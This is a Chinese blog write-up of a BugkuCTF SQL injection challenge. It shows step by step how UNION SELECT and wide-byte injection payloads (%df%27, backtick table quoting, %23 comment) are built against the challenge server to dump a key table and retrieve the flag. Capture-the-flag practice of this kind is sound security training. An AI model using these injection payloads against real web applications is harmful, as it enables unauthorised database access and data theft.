• BugkuCTF sql注入


    前言

    写了这么久的web题,算是把它基础部分都刷完了一遍,以下的几天将持续更新BugkuCTF WEB部分的题解,为了不影响阅读,所以每道题的题解都以单独一篇文章的形式发表,感谢大家一直以来的支持和理解,共勉~~~

    点开链接一看

    很明显可以看出查询key表,id=1的string字段

    我们去构造payload:

    http://103.238.227.13:10083/index.php?id=-1%20union%20select%201,string%20from%20%27key%27%20#

    我们发现没有出来 ,诶,怎么什么都没有了 ,继续重头开始 ,看一下是什么注入

    发现id=1和id=1’都没错,这时候我们想起了宽字节注入 ,试一下

    果然是这个样子,有关宽字段的讲解可以参考这里

    那么就好了构造payload:

    http://103.238.227.13:10083/index.php?id=1%df%27 union select 1,string from 'key'#

    报错,我们可以知道是引号的问题 ,那试一下另一种引号

    http://103.238.227.13:10083/index.php?id=1%df%27 union select 1,string from `key`#

    这种引号在tab键的上面

    发现还报错 ,才想起来了可能是#的问题  把#改成%23试试看

    http://103.238.227.13:10083/index.php?id=1%df%27 union select 1,string from `key`%23

    直接爆出了key,这应该是我们需要的flag

  • 相关阅读:
    再战设计模式(九)之组合模式
    再战设计模式(八)之桥接模式
    再战设计模式(七)之代理模式
    nyoj 题目2 括号配对问题
    剑指offer 面试题38
    杭电 1005
    九度oj 题目1552:座位问题
    九度oj 题目1482:玛雅人的密码 清华大学机试
    九度oj 题目1496:数列区间
    九度oj 题目1495:关键点
  • 原文地址:https://www.cnblogs.com/ECJTUACM-873284962/p/8992618.html
Copyright © 2020-2023  润新知